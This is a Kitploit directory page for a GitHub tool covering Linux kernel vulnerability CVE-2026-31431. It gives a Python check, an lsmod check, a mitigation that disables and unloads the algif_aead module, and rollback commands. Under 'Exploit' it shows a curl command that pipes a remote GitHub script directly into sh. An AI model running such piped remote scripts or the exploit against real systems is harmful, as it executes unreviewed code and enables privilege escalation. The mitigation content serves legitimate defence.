Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-31431 — Tests for CVE-2026-31431 kernel vulnerability, checks if vulnerable, and provides a fix by disabling the algif_aead module. | Kitploit
Tools/GitHubGitHub/studiogangster/cve-2026-31431
Privilege EscalationVulnerability AnalysisExploitation
GitHubstudiogangster/cve-2026-31431

CVE-2026-31431

Tests for CVE-2026-31431 kernel vulnerability, checks if vulnerable, and provides a fix by disabling the algif_aead module.

View Repository
13 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Test, patch, fix: CVE-2026-31431

root@kitploit:~
# Test:Check vuln
python3 -c 'import socket;exec("try:s=socket.socket(socket.AF_ALG,socket.SOCK_SEQPACKET,0);s.bind((\"aead\",\"authencesn(hmac(sha256),cbc(aes))\"));print(\"vulnerable\")\nexcept:print(\"not vulnerable\")")'
root@kitploit:~
# check if module
# Check if module is loaded in kernel
lsmod | grep -q '^algif_aead' && echo "loaded" || echo "not loaded"
root@kitploit:~
# Fix: Remove the mod
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
root@kitploit:~
# Rollback: reload the mod
sudo rm -f /etc/modprobe.d/disable-algif.conf
sudo depmod -a

Exploit

root@kitploit:~
# exploit
curl https://raw.githubusercontent.com/studiogangster/CVE-2026-31431/refs/heads/main/test.sh | sh
Download Tool